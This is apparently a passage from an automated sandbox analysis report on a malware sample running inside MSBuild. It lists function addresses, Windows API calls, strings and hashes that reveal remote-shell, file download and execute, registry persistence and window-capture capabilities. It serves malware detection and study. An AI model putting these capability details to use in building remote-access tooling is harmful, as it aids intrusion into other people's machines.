                                                                                                                                            • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                                                                            Function 00409517 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcslen
                                                                                                                                            • String ID: xAG
                                                                                                                                            • API String ID: 176396367-2759412365
                                                                                                                                            • Opcode ID: 0ac88d79a516735da27acb6035cf341692fb6add59adde25db919d3c5127634c
                                                                                                                                            • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                                                                                                                                            • Opcode Fuzzy Hash: 0ac88d79a516735da27acb6035cf341692fb6add59adde25db919d3c5127634c
                                                                                                                                            • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                                                                                                                                            Function 0041A945 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A959
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 1890195054-2766056989
                                                                                                                                            • Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                                            • Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
                                                                                                                                            • Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                                            • Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
                                                                                                                                            Function 0044B9BE Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 0044B9DF
                                                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                            • RtlReAllocateHeap.NTDLL(00000000,00475D30,?,00000004,00000000,?,0044E90A,00475D30,00000004,?,00475D30,?,?,00443125,00475D30,?), ref: 0044BA1B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap$_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1482568997-0
                                                                                                                                            • Opcode ID: 4aeba00e3fff788b378028bf06d7bcfcb791a64fa1e6dc072cb532da7a87caba
                                                                                                                                            • Instruction ID: 12956794463f81a5c067cbc08b9f94d22fea268b9007f3edb04f63306941b305
                                                                                                                                            • Opcode Fuzzy Hash: 4aeba00e3fff788b378028bf06d7bcfcb791a64fa1e6dc072cb532da7a87caba
                                                                                                                                            • Instruction Fuzzy Hash: D6F0F67210051167FF212A27AC01B6B2B2CDFC27B1F15012BFA18AA292DF6CCC0191EE
                                                                                                                                            Function 004041F1 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                                              • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateEventStartupsocket
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1953588214-0
                                                                                                                                            • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                                            • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                                                                            • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                                            • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                                                                            Function 0043360D Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                                                                                              • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,00434411,?,?,?,?,?,?,?,?,00434411,?,0046D644,0041AD75,?), ref: 00437C37
                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3476068407-0
                                                                                                                                            • Opcode ID: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                                                                                                                            • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                                                                                                            • Opcode Fuzzy Hash: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                                                                                                                            • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                                                                                                            Function 0041AC52 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetForegroundWindow.USER32 ref: 0041AC74
                                                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC87
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$ForegroundText
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 29597999-0
                                                                                                                                            • Opcode ID: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                                                                            • Instruction ID: 3cf16c2a8257e52241c70e3f2477159e0ff99a2dafdd86ddfb3cfc0a4d760bbd
                                                                                                                                            • Opcode Fuzzy Hash: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                                                                            • Instruction Fuzzy Hash: 56E04875A0031467EB24A765AC4EFDA766C9704715F0000B9BA19D21C3E9B4EA04CBE4
                                                                                                                                            Function 004106D3 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VirtualProtect.KERNEL32(?,00410B02,?,00000000,?,00000000,00000000,00410891), ref: 0041075D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 544645111-0
                                                                                                                                            • Opcode ID: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
                                                                                                                                            • Instruction ID: f15b865ef06e6e56f0e3155fe6c262580cd03049418ed3f125d30449dfe24c6e
                                                                                                                                            • Opcode Fuzzy Hash: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
                                                                                                                                            • Instruction Fuzzy Hash: 0B11CE72700101AFD6149A18C880BA6B766FF80710F5942AEE115CB292DBB5FCD2CA94
                                                                                                                                            Function 00446AFF Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                            • Opcode ID: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                                                                            • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                                                                                            • Opcode Fuzzy Hash: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                                                                            • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                                                                                            Function 00404262 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Startup
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 724789610-0
                                                                                                                                            • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                                            • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                                                                            • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                                            • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                                                                            Function 0042610E Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: send
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2809346765-0
                                                                                                                                            • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                                            • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                                                                            • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                                            • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                                                                                            Function 0040262E Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Deallocate
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1075933841-0
                                                                                                                                            • Opcode ID: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                                            • Instruction ID: a98dd8728e001a7547a03d6555be836c7c4d92c50a1b5b3c87ce8ff60de75990
                                                                                                                                            • Opcode Fuzzy Hash: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                                            • Instruction Fuzzy Hash: 69A0123300C2016AC9852E00DD05C0ABFA1EB90360F20C41FF086140F0CB32A0B0A705
                                                                                                                                            Function 00410ABE Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VirtualAlloc.KERNEL32(?,?,?,?,00410BFE,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00410ACE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                            • Opcode ID: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
                                                                                                                                            • Instruction ID: 38694f91ddd66904e98ee13f1febf2482794bae3131ffd3a876a6d6af10a8f86
                                                                                                                                            • Opcode Fuzzy Hash: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
                                                                                                                                            • Instruction Fuzzy Hash: 29B00832418382EFCF02DF90DD0492ABAA2BB88712F084C6CB2A14017187228428EB16

                                                                                                                                            Non-executed Functions

                                                                                                                                            Function 00406F06 Relevance: 46.3, APIs: 10, Strings: 16, Instructions: 849filesleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                                                              • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                                                              • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                                                              • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                              • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                                              • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                                              • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                                              • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(000002C4,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                                              • Part of subcall function 00404468: SetEvent.KERNEL32(000002C4,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                                                              • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                                              • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                                              • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                                            • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                                                            • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                                                              • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                                                            • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                                                            • API String ID: 2918587301-599666313
                                                                                                                                            • Opcode ID: b7a69f1bcbcf96e48006821f0f8484e4d196d563d615a55e7ff915e2f65eacdc
                                                                                                                                            • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                                                                                            • Opcode Fuzzy Hash: b7a69f1bcbcf96e48006821f0f8484e4d196d563d615a55e7ff915e2f65eacdc
                                                                                                                                            • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                                                                                            Function 00405042 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 280pipesleepfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                                                            • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                                                                            • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                                                            • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                                                            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                                                            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                                                            • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                                                            • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                                                            • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                                                            • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                                                            • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                            • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                                                                            • API String ID: 3815868655-81343324
                                                                                                                                            • Opcode ID: d750428f01d036d271b251ec8fd94350236a07052f6e69f1ab6544ab59714425
                                                                                                                                            • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                                                                            • Opcode Fuzzy Hash: d750428f01d036d271b251ec8fd94350236a07052f6e69f1ab6544ab59714425
                                                                                                                                            • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                                                                            Function 00410F36 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                                                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                              • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                              • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
